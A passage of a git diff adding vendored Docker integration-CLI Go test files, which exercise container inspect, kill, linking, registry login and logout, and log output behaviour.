+	out, _ = dockerCmd(c, "inspect", name)
+	c.Assert(out, checker.Contains, `soanni&rtr`)
+}
+
+func (s *DockerSuite) TestInspectPlugin(c *check.C) {
+	testRequires(c, DaemonIsLinux, IsAmd64, Network)
+	_, _, err := dockerCmdWithError("plugin", "install", "--grant-all-permissions", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+
+	out, _, err := dockerCmdWithError("inspect", "--type", "plugin", "--format", "{{.Name}}", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, pNameWithTag)
+
+	out, _, err = dockerCmdWithError("inspect", "--format", "{{.Name}}", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, pNameWithTag)
+
+	// Even without tag the inspect still work
+	out, _, err = dockerCmdWithError("inspect", "--type", "plugin", "--format", "{{.Name}}", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, pNameWithTag)
+
+	out, _, err = dockerCmdWithError("inspect", "--format", "{{.Name}}", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Equals, pNameWithTag)
+
+	_, _, err = dockerCmdWithError("plugin", "disable", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+
+	out, _, err = dockerCmdWithError("plugin", "remove", pNameWithTag)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, pNameWithTag)
+}
+
+// Test case for 29185
+func (s *DockerSuite) TestInspectUnknownObject(c *check.C) {
+	// This test should work on both Windows and Linux
+	out, _, err := dockerCmdWithError("inspect", "foobar")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "Error: No such object: foobar")
+	c.Assert(err.Error(), checker.Contains, "Error: No such object: foobar")
+}
+
+func (s *DockerSuite) TestInpectInvalidReference(c *check.C) {
+	// This test should work on both Windows and Linux
+	out, _, err := dockerCmdWithError("inspect", "FooBar")
+	c.Assert(err, checker.NotNil)
+	c.Assert(out, checker.Contains, "Error: No such object: FooBar")
+	c.Assert(err.Error(), checker.Contains, "Error: No such object: FooBar")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go
new file mode 100644
index 0000000000..43164801d4
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go
@@ -0,0 +1,134 @@
+package main
+
+import (
+	"fmt"
+	"net/http"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestKillContainer(c *check.C) {
+	out, _ := runSleepingContainer(c, "-d")
+	cleanedContainerID := strings.TrimSpace(out)
+	c.Assert(waitRun(cleanedContainerID), check.IsNil)
+
+	dockerCmd(c, "kill", cleanedContainerID)
+	c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil)
+
+	out, _ = dockerCmd(c, "ps", "-q")
+	c.Assert(out, checker.Not(checker.Contains), cleanedContainerID, check.Commentf("killed container is still running"))
+
+}
+
+func (s *DockerSuite) TestKillOffStoppedContainer(c *check.C) {
+	out, _ := runSleepingContainer(c, "-d")
+	cleanedContainerID := strings.TrimSpace(out)
+
+	dockerCmd(c, "stop", cleanedContainerID)
+	c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil)
+
+	_, _, err := dockerCmdWithError("kill", "-s", "30", cleanedContainerID)
+	c.Assert(err, check.Not(check.IsNil), check.Commentf("Container %s is not running", cleanedContainerID))
+}
+
+func (s *DockerSuite) TestKillDifferentUserContainer(c *check.C) {
+	// TODO Windows: Windows does not yet support -u (Feb 2016).
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-u", "daemon", "-d", "busybox", "top")
+	cleanedContainerID := strings.TrimSpace(out)
+	c.Assert(waitRun(cleanedContainerID), check.IsNil)
+
+	dockerCmd(c, "kill", cleanedContainerID)
+	c.Assert(waitExited(cleanedContainerID, 10*time.Second), check.IsNil)
+
+	out, _ = dockerCmd(c, "ps", "-q")
+	c.Assert(out, checker.Not(checker.Contains), cleanedContainerID, check.Commentf("killed container is still running"))
+
+}
+
+// regression test about correct signal parsing see #13665
+func (s *DockerSuite) TestKillWithSignal(c *check.C) {
+	// Cannot port to Windows - does not support signals in the same way Linux does
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
+	cid := strings.TrimSpace(out)
+	c.Assert(waitRun(cid), check.IsNil)
+
+	dockerCmd(c, "kill", "-s", "SIGWINCH", cid)
+	time.Sleep(250 * time.Millisecond)
+
+	running := inspectField(c, cid, "State.Running")
+
+	c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after SIGWINCH"))
+}
+
+func (s *DockerSuite) TestKillWithStopSignalWithSameSignalShouldDisableRestartPolicy(c *check.C) {
+	// Cannot port to Windows - does not support signals int the same way as Linux does
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "--stop-signal=TERM", "--restart=always", "busybox", "top")
+	cid := strings.TrimSpace(out)
+	c.Assert(waitRun(cid), check.IsNil)
+
+	// Let docker send a TERM signal to the container
+	// It will kill the process and disable the restart policy
+	dockerCmd(c, "kill", "-s", "TERM", cid)
+	c.Assert(waitExited(cid, 10*time.Second), check.IsNil)
+
+	out, _ = dockerCmd(c, "ps", "-q")
+	c.Assert(out, checker.Not(checker.Contains), cid, check.Commentf("killed container is still running"))
+}
+
+func (s *DockerSuite) TestKillWithStopSignalWithDifferentSignalShouldKeepRestartPolicy(c *check.C) {
+	// Cannot port to Windows - does not support signals int the same way as Linux does
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "--stop-signal=CONT", "--restart=always", "busybox", "top")
+	cid := strings.TrimSpace(out)
+	c.Assert(waitRun(cid), check.IsNil)
+
+	// Let docker send a TERM signal to the container
+	// It will kill the process, but not disable the restart policy
+	dockerCmd(c, "kill", "-s", "TERM", cid)
+	c.Assert(waitRestart(cid, 10*time.Second), check.IsNil)
+
+	// Restart policy should still be in place, so it should be still running
+	c.Assert(waitRun(cid), check.IsNil)
+}
+
+// FIXME(vdemeester) should be a unit test
+func (s *DockerSuite) TestKillWithInvalidSignal(c *check.C) {
+	out, _ := runSleepingContainer(c, "-d")
+	cid := strings.TrimSpace(out)
+	c.Assert(waitRun(cid), check.IsNil)
+
+	out, _, err := dockerCmdWithError("kill", "-s", "0", cid)
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, "Invalid signal: 0", check.Commentf("Kill with an invalid signal didn't error out correctly"))
+
+	running := inspectField(c, cid, "State.Running")
+	c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after an invalid signal"))
+
+	out, _ = runSleepingContainer(c, "-d")
+	cid = strings.TrimSpace(out)
+	c.Assert(waitRun(cid), check.IsNil)
+
+	out, _, err = dockerCmdWithError("kill", "-s", "SIG42", cid)
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, "Invalid signal: SIG42", check.Commentf("Kill with an invalid signal error out correctly"))
+
+	running = inspectField(c, cid, "State.Running")
+	c.Assert(running, checker.Equals, "true", check.Commentf("Container should be in running state after an invalid signal"))
+
+}
+
+func (s *DockerSuite) TestKillStoppedContainerAPIPre120(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later
+	runSleepingContainer(c, "--name", "docker-kill-test-api", "-d")
+	dockerCmd(c, "stop", "docker-kill-test-api")
+
+	status, _, err := sockRequest("POST", fmt.Sprintf("/v1.19/containers/%s/kill", "docker-kill-test-api"), nil)
+	c.Assert(err, check.IsNil)
+	c.Assert(status, check.Equals, http.StatusNoContent)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go
new file mode 100644
index 0000000000..a5872d9e0c
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_test.go
@@ -0,0 +1,240 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"regexp"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/runconfig"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestLinksPingUnlinkedContainers(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	_, exitCode, err := dockerCmdWithError("run", "--rm", "busybox", "sh", "-c", "ping -c 1 alias1 -W 1 && ping -c 1 alias2 -W 1")
+
+	// run ping failed with error
+	c.Assert(exitCode, checker.Equals, 1, check.Commentf("error: %v", err))
+}
+
+// Test for appropriate error when calling --link with an invalid target container
+func (s *DockerSuite) TestLinksInvalidContainerTarget(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _, err := dockerCmdWithError("run", "--link", "bogus:alias", "busybox", "true")
+
+	// an invalid container target should produce an error
+	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+	// an invalid container target should produce an error
+	c.Assert(out, checker.Contains, "Could not get container")
+}
+
+func (s *DockerSuite) TestLinksPingLinkedContainers(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	// Test with the three different ways of specifying the default network on Linux
+	testLinkPingOnNetwork(c, "")
+	testLinkPingOnNetwork(c, "default")
+	testLinkPingOnNetwork(c, "bridge")
+}
+
+func testLinkPingOnNetwork(c *check.C, network string) {
+	var postArgs []string
+	if network != "" {
+		postArgs = append(postArgs, []string{"--net", network}...)
+	}
+	postArgs = append(postArgs, []string{"busybox", "top"}...)
+	runArgs1 := append([]string{"run", "-d", "--name", "container1", "--hostname", "fred"}, postArgs...)
+	runArgs2 := append([]string{"run", "-d", "--name", "container2", "--hostname", "wilma"}, postArgs...)
+
+	// Run the two named containers
+	dockerCmd(c, runArgs1...)
+	dockerCmd(c, runArgs2...)
+
+	postArgs = []string{}
+	if network != "" {
+		postArgs = append(postArgs, []string{"--net", network}...)
+	}
+	postArgs = append(postArgs, []string{"busybox", "sh", "-c"}...)
+
+	// Format a run for a container which links to the other two
+	runArgs := append([]string{"run", "--rm", "--link", "container1:alias1", "--link", "container2:alias2"}, postArgs...)
+	pingCmd := "ping -c 1 %s -W 1 && ping -c 1 %s -W 1"
+
+	// test ping by alias, ping by name, and ping by hostname
+	// 1. Ping by alias
+	dockerCmd(c, append(runArgs, fmt.Sprintf(pingCmd, "alias1", "alias2"))...)
+	// 2. Ping by container name
+	dockerCmd(c, append(runArgs, fmt.Sprintf(pingCmd, "container1", "container2"))...)
+	// 3. Ping by hostname
+	dockerCmd(c, append(runArgs, fmt.Sprintf(pingCmd, "fred", "wilma"))...)
+
+	// Clean for next round
+	dockerCmd(c, "rm", "-f", "container1")
+	dockerCmd(c, "rm", "-f", "container2")
+}
+
+func (s *DockerSuite) TestLinksPingLinkedContainersAfterRename(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top")
+	idA := strings.TrimSpace(out)
+	out, _ = dockerCmd(c, "run", "-d", "--name", "container2", "busybox", "top")
+	idB := strings.TrimSpace(out)
+	dockerCmd(c, "rename", "container1", "container_new")
+	dockerCmd(c, "run", "--rm", "--link", "container_new:alias1", "--link", "container2:alias2", "busybox", "sh", "-c", "ping -c 1 alias1 -W 1 && ping -c 1 alias2 -W 1")
+	dockerCmd(c, "kill", idA)
+	dockerCmd(c, "kill", idB)
+
+}
+
+func (s *DockerSuite) TestLinksInspectLinksStarted(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	var (
+		expected = map[string]struct{}{"/container1:/testinspectlink/alias1": {}, "/container2:/testinspectlink/alias2": {}}
+		result   []string
+	)
+	dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--name", "container2", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--name", "testinspectlink", "--link", "container1:alias1", "--link", "container2:alias2", "busybox", "top")
+	links := inspectFieldJSON(c, "testinspectlink", "HostConfig.Links")
+
+	err := json.Unmarshal([]byte(links), &result)
+	c.Assert(err, checker.IsNil)
+
+	output := convertSliceOfStringsToMap(result)
+
+	c.Assert(output, checker.DeepEquals, expected)
+}
+
+func (s *DockerSuite) TestLinksInspectLinksStopped(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	var (
+		expected = map[string]struct{}{"/container1:/testinspectlink/alias1": {}, "/container2:/testinspectlink/alias2": {}}
+		result   []string
+	)
+	dockerCmd(c, "run", "-d", "--name", "container1", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--name", "container2", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--name", "testinspectlink", "--link", "container1:alias1", "--link", "container2:alias2", "busybox", "true")
+	links := inspectFieldJSON(c, "testinspectlink", "HostConfig.Links")
+
+	err := json.Unmarshal([]byte(links), &result)
+	c.Assert(err, checker.IsNil)
+
+	output := convertSliceOfStringsToMap(result)
+
+	c.Assert(output, checker.DeepEquals, expected)
+}
+
+func (s *DockerSuite) TestLinksNotStartedParentNotFail(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "create", "--name=first", "busybox", "top")
+	dockerCmd(c, "create", "--name=second", "--link=first:first", "busybox", "top")
+	dockerCmd(c, "start", "first")
+
+}
+
+func (s *DockerSuite) TestLinksHostsFilesInject(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, SameHostDaemon, ExecSupport)
+
+	out, _ := dockerCmd(c, "run", "-itd", "--name", "one", "busybox", "top")
+	idOne := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "run", "-itd", "--name", "two", "--link", "one:onetwo", "busybox", "top")
+	idTwo := strings.TrimSpace(out)
+
+	c.Assert(waitRun(idTwo), checker.IsNil)
+
+	contentOne, err := readContainerFileWithExec(idOne, "/etc/hosts")
+	c.Assert(err, checker.IsNil, check.Commentf("contentOne: %s", string(contentOne)))
+
+	contentTwo, err := readContainerFileWithExec(idTwo, "/etc/hosts")
+	c.Assert(err, checker.IsNil, check.Commentf("contentTwo: %s", string(contentTwo)))
+	// Host is not present in updated hosts file
+	c.Assert(string(contentTwo), checker.Contains, "onetwo")
+}
+
+func (s *DockerSuite) TestLinksUpdateOnRestart(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	testRequires(c, SameHostDaemon, ExecSupport)
+	dockerCmd(c, "run", "-d", "--name", "one", "busybox", "top")
+	out, _ := dockerCmd(c, "run", "-d", "--name", "two", "--link", "one:onetwo", "--link", "one:one", "busybox", "top")
+	id := strings.TrimSpace(string(out))
+
+	realIP := inspectField(c, "one", "NetworkSettings.Networks.bridge.IPAddress")
+	content, err := readContainerFileWithExec(id, "/etc/hosts")
+	c.Assert(err, checker.IsNil)
+
+	getIP := func(hosts []byte, hostname string) string {
+		re := regexp.MustCompile(fmt.Sprintf(`(\S*)\t%s`, regexp.QuoteMeta(hostname)))
+		matches := re.FindSubmatch(hosts)
+		c.Assert(matches, checker.NotNil, check.Commentf("Hostname %s have no matches in hosts", hostname))
+		return string(matches[1])
+	}
+	ip := getIP(content, "one")
+	c.Assert(ip, checker.Equals, realIP)
+
+	ip = getIP(content, "onetwo")
+	c.Assert(ip, checker.Equals, realIP)
+
+	dockerCmd(c, "restart", "one")
+	realIP = inspectField(c, "one", "NetworkSettings.Networks.bridge.IPAddress")
+
+	content, err = readContainerFileWithExec(id, "/etc/hosts")
+	c.Assert(err, checker.IsNil, check.Commentf("content: %s", string(content)))
+	ip = getIP(content, "one")
+	c.Assert(ip, checker.Equals, realIP)
+
+	ip = getIP(content, "onetwo")
+	c.Assert(ip, checker.Equals, realIP)
+}
+
+func (s *DockerSuite) TestLinksEnvs(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-d", "-e", "e1=", "-e", "e2=v2", "-e", "e3=v3=v3", "--name=first", "busybox", "top")
+	out, _ := dockerCmd(c, "run", "--name=second", "--link=first:first", "busybox", "env")
+	c.Assert(out, checker.Contains, "FIRST_ENV_e1=\n")
+	c.Assert(out, checker.Contains, "FIRST_ENV_e2=v2")
+	c.Assert(out, checker.Contains, "FIRST_ENV_e3=v3=v3")
+}
+
+func (s *DockerSuite) TestLinkShortDefinition(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "--name", "shortlinkdef", "busybox", "top")
+
+	cid := strings.TrimSpace(out)
+	c.Assert(waitRun(cid), checker.IsNil)
+
+	out, _ = dockerCmd(c, "run", "-d", "--name", "link2", "--link", "shortlinkdef", "busybox", "top")
+
+	cid2 := strings.TrimSpace(out)
+	c.Assert(waitRun(cid2), checker.IsNil)
+
+	links := inspectFieldJSON(c, cid2, "HostConfig.Links")
+	c.Assert(links, checker.Equals, "[\"/shortlinkdef:/link2/shortlinkdef\"]")
+}
+
+func (s *DockerSuite) TestLinksNetworkHostContainer(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	dockerCmd(c, "run", "-d", "--net", "host", "--name", "host_container", "busybox", "top")
+	out, _, err := dockerCmdWithError("run", "--name", "should_fail", "--link", "host_container:tester", "busybox", "true")
+
+	// Running container linking to a container with --net host should have failed
+	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+	// Running container linking to a container with --net host should have failed
+	c.Assert(out, checker.Contains, runconfig.ErrConflictHostNetworkAndLinks.Error())
+}
+
+func (s *DockerSuite) TestLinksEtcHostsRegularFile(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	out, _ := dockerCmd(c, "run", "--net=host", "busybox", "ls", "-la", "/etc/hosts")
+	// /etc/hosts should be a regular file
+	c.Assert(out, checker.Matches, "^-.+\n")
+}
+
+func (s *DockerSuite) TestLinksMultipleWithSameName(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-d", "--name=upstream-a", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--name=upstream-b", "busybox", "top")
+	dockerCmd(c, "run", "--link", "upstream-a:upstream", "--link", "upstream-b:upstream", "busybox", "sh", "-c", "ping -c 1 upstream")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go
new file mode 100644
index 0000000000..1af927930d
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go
@@ -0,0 +1,26 @@
+// +build !windows
+
+package main
+
+import (
+	"io/ioutil"
+	"os"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestLinksEtcHostsContentMatch(c *check.C) {
+	// In a _unix file as using Unix specific files, and must be on the
+	// same host as the daemon.
+	testRequires(c, SameHostDaemon, NotUserNamespace)
+
+	out, _ := dockerCmd(c, "run", "--net=host", "busybox", "cat", "/etc/hosts")
+	hosts, err := ioutil.ReadFile("/etc/hosts")
+	if os.IsNotExist(err) {
+		c.Skip("/etc/hosts does not exist, skip this test")
+	}
+
+	c.Assert(out, checker.Equals, string(hosts), check.Commentf("container: %s\n\nhost:%s", out, hosts))
+
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go
new file mode 100644
index 0000000000..01de75d985
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_login_test.go
@@ -0,0 +1,44 @@
+package main
+
+import (
+	"bytes"
+	"os/exec"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestLoginWithoutTTY(c *check.C) {
+	cmd := exec.Command(dockerBinary, "login")
+
+	// Send to stdin so the process does not get the TTY
+	cmd.Stdin = bytes.NewBufferString("buffer test string \n")
+
+	// run the command and block until it's done
+	err := cmd.Run()
+	c.Assert(err, checker.NotNil) //"Expected non nil err when loginning in & TTY not available"
+}
+
+func (s *DockerRegistryAuthHtpasswdSuite) TestLoginToPrivateRegistry(c *check.C) {
+	// wrong credentials
+	out, _, err := dockerCmdWithError("login", "-u", s.reg.username, "-p", "WRONGPASSWORD", privateRegistryURL)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "401 Unauthorized")
+
+	// now it's fine
+	dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL)
+}
+
+func (s *DockerRegistryAuthHtpasswdSuite) TestLoginToPrivateRegistryDeprecatedEmailFlag(c *check.C) {
+	// Test to make sure login still works with the deprecated -e and --email flags
+	// wrong credentials
+	out, _, err := dockerCmdWithError("login", "-u", s.reg.username, "-p", "WRONGPASSWORD", "-e", s.reg.email, privateRegistryURL)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "401 Unauthorized")
+
+	// now it's fine
+	// -e flag
+	dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, "-e", s.reg.email, privateRegistryURL)
+	// --email flag
+	dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, "--email", s.reg.email, privateRegistryURL)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go
new file mode 100644
index 0000000000..a5f4b108cf
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_logout_test.go
@@ -0,0 +1,100 @@
+package main
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithExternalAuth(c *check.C) {
+	osPath := os.Getenv("PATH")
+	defer os.Setenv("PATH", osPath)
+
+	workingDir, err := os.Getwd()
+	c.Assert(err, checker.IsNil)
+	absolute, err := filepath.Abs(filepath.Join(workingDir, "fixtures", "auth"))
+	c.Assert(err, checker.IsNil)
+	testPath := fmt.Sprintf("%s%c%s", osPath, filepath.ListSeparator, absolute)
+
+	os.Setenv("PATH", testPath)
+
+	repoName := fmt.Sprintf("%v/dockercli/busybox:authtest", privateRegistryURL)
+
+	tmp, err := ioutil.TempDir("", "integration-cli-")
+	c.Assert(err, checker.IsNil)
+
+	externalAuthConfig := `{ "credsStore": "shell-test" }`
+
+	configPath := filepath.Join(tmp, "config.json")
+	err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644)
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL)
+
+	b, err := ioutil.ReadFile(configPath)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(b), checker.Not(checker.Contains), "\"auth\":")
+	c.Assert(string(b), checker.Contains, privateRegistryURL)
+
+	dockerCmd(c, "--config", tmp, "tag", "busybox", repoName)
+	dockerCmd(c, "--config", tmp, "push", repoName)
+
+	dockerCmd(c, "--config", tmp, "logout", privateRegistryURL)
+
+	b, err = ioutil.ReadFile(configPath)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(b), checker.Not(checker.Contains), privateRegistryURL)
+
+	// check I cannot pull anymore
+	out, _, err := dockerCmdWithError("--config", tmp, "pull", repoName)
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Error: image dockercli/busybox:authtest not found")
+}
+
+// #23100
+func (s *DockerRegistryAuthHtpasswdSuite) TestLogoutWithWrongHostnamesStored(c *check.C) {
+	osPath := os.Getenv("PATH")
+	defer os.Setenv("PATH", osPath)
+
+	workingDir, err := os.Getwd()
+	c.Assert(err, checker.IsNil)
+	absolute, err := filepath.Abs(filepath.Join(workingDir, "fixtures", "auth"))
+	c.Assert(err, checker.IsNil)
+	testPath := fmt.Sprintf("%s%c%s", osPath, filepath.ListSeparator, absolute)
+
+	os.Setenv("PATH", testPath)
+
+	cmd := exec.Command("docker-credential-shell-test", "store")
+	stdin := bytes.NewReader([]byte(fmt.Sprintf(`{"ServerURL": "https://%s", "Username": "%s", "Secret": "%s"}`, privateRegistryURL, s.reg.username, s.reg.password)))
+	cmd.Stdin = stdin
+	c.Assert(cmd.Run(), checker.IsNil)
+
+	tmp, err := ioutil.TempDir("", "integration-cli-")
+	c.Assert(err, checker.IsNil)
+
+	externalAuthConfig := fmt.Sprintf(`{ "auths": {"https://%s": {}}, "credsStore": "shell-test" }`, privateRegistryURL)
+
+	configPath := filepath.Join(tmp, "config.json")
+	err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644)
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL)
+
+	b, err := ioutil.ReadFile(configPath)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(b), checker.Contains, fmt.Sprintf("\"https://%s\": {}", privateRegistryURL))
+	c.Assert(string(b), checker.Contains, fmt.Sprintf("\"%s\": {}", privateRegistryURL))
+
+	dockerCmd(c, "--config", tmp, "logout", privateRegistryURL)
+
+	b, err = ioutil.ReadFile(configPath)
+	c.Assert(err, checker.IsNil)
+	c.Assert(string(b), checker.Not(checker.Contains), fmt.Sprintf("\"https://%s\": {}", privateRegistryURL))
+	c.Assert(string(b), checker.Not(checker.Contains), fmt.Sprintf("\"%s\": {}", privateRegistryURL))
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_bench_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_bench_test.go
new file mode 100644
index 0000000000..eeb008de70
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_bench_test.go
@@ -0,0 +1,32 @@
+package main
+
+import (
+	"fmt"
+	"strings"
+	"time"
+
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) BenchmarkLogsCLIRotateFollow(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "--log-opt", "max-size=1b", "--log-opt", "max-file=10", "busybox", "sh", "-c", "while true; do usleep 50000; echo hello; done")
+	id := strings.TrimSpace(out)
+	ch := make(chan error, 1)
+	go func() {
+		ch <- nil
+		out, _, _ := dockerCmdWithError("logs", "-f", id)
+		// if this returns at all, it's an error
+		ch <- fmt.Errorf(out)
+	}()
+
+	<-ch
+	select {
+	case <-time.After(30 * time.Second):
+		// ran for 30 seconds with no problem
+		return
+	case err := <-ch:
+		if err != nil {
+			c.Fatal(err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go
new file mode 100644
index 0000000000..d2dcad1052
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_logs_test.go
@@ -0,0 +1,328 @@
+package main
+
+import (
+	"fmt"
+	"io"
+	"os/exec"
+	"regexp"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/pkg/jsonlog"
+	"github.com/go-check/check"
+)
+
+// This used to work, it test a log of PageSize-1 (gh#4851)
+func (s *DockerSuite) TestLogsContainerSmallerThanPage(c *check.C) {
+	testLen := 32767
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen))
+
+	id := strings.TrimSpace(out)
+	dockerCmd(c, "wait", id)
+
+	out, _ = dockerCmd(c, "logs", id)
+
+	c.Assert(out, checker.HasLen, testLen+1)
+}
+
+// Regression test: When going over the PageSize, it used to panic (gh#4851)
+func (s *DockerSuite) TestLogsContainerBiggerThanPage(c *check.C) {
+	testLen := 32768
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen))
+
+	id := strings.TrimSpace(out)
+	dockerCmd(c, "wait", id)
+
+	out, _ = dockerCmd(c, "logs", id)
+
+	c.Assert(out, checker.HasLen, testLen+1)
+}
+
+// Regression test: When going much over the PageSize, it used to block (gh#4851)
+func (s *DockerSuite) TestLogsContainerMuchBiggerThanPage(c *check.C) {
+	testLen := 33000
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo -n = >> a.a; done; echo >> a.a; cat a.a", testLen))
+
+	id := strings.TrimSpace(out)
+	dockerCmd(c, "wait", id)
+
+	out, _ = dockerCmd(c, "logs", id)
+
+	c.Assert(out, checker.HasLen, testLen+1)
+}
+
+func (s *DockerSuite) TestLogsTimestamps(c *check.C) {
+	testLen := 100
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", fmt.Sprintf("for i in $(seq 1 %d); do echo = >> a.a; done; cat a.a", testLen))
+
+	id := strings.TrimSpace(out)
+	dockerCmd(c, "wait", id)
+
+	out, _ = dockerCmd(c, "logs", "-t", id)
+
+	lines := strings.Split(out, "\n")
+
+	c.Assert(lines, checker.HasLen, testLen+1)
+
+	ts := regexp.MustCompile(`^.* `)
+
+	for _, l := range lines {
+		if l != "" {
+			_, err := time.Parse(jsonlog.RFC3339NanoFixed+" ", ts.FindString(l))
+			c.Assert(err, checker.IsNil, check.Commentf("Failed to parse timestamp from %v", l))
+			// ensure we have padded 0's
+			c.Assert(l[29], checker.Equals, uint8('Z'))
+		}
+	}
+}
+
+func (s *DockerSuite) TestLogsSeparateStderr(c *check.C) {
+	msg := "stderr_log"
